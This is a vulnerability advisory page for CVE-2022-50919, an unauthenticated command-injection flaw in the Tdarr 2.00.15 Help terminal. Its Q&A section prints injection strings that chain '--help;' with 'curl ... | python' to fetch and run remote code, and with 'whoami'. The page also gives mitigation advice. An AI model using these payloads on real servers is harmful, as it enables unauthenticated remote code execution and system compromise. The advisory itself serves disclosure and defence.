CVE-2022-50919
Unauthenticated Remote Code Execution in Tdarr 2.00.15 Help Terminal
Publication date: 2026-01-13
Last updated on: 2026-01-13
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| tdarr | tdarr | From 2.00.15 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2022-50919 is a critical remote code execution vulnerability in Tdarr version 2.00.15. It exists in the Help terminal feature, which lacks proper input filtering and does not require authentication. Attackers can inject and chain arbitrary commands, such as using '--help; curl .py | python', to execute remote code on the server running Tdarr without any credentials. [1, 2]
How can this vulnerability impact me? :
This vulnerability allows unauthenticated remote attackers to execute arbitrary commands on the Tdarr server. This can lead to unauthorized access, execution of malicious scripts, spawning of reverse shells, and potential full compromise of the system hosting Tdarr. Sensitive information could be exposed or altered, and the server could be used as a foothold for further attacks. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to inject commands into the Tdarr Help terminal input and observing if arbitrary commands execute without authentication. For example, you can try commands like `--help; whoami` or `--help; curl http://yourserver/test.py | python` to see if the system executes them. Monitoring network traffic for unusual outbound connections initiated by Tdarr, such as unexpected curl requests, may also indicate exploitation attempts. [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include disabling or restricting access to the Tdarr Help terminal feature to prevent unauthenticated command injection. Applying any available patches or updates from the vendor that address this vulnerability is critical. Additionally, implementing network-level controls such as firewall rules to block unauthorized access to Tdarr services and monitoring for suspicious activity can help reduce risk until a fix is applied. [1, 2]